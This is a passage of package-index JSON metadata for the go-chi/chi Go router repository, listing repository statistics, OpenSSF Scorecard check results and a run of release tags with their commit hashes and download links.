github.com/GO-CHI/chi/v5","documentation_url":"https://pkg.go.dev/github.com/GO-CHI/chi/v5#section-documentation","metadata":{},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","s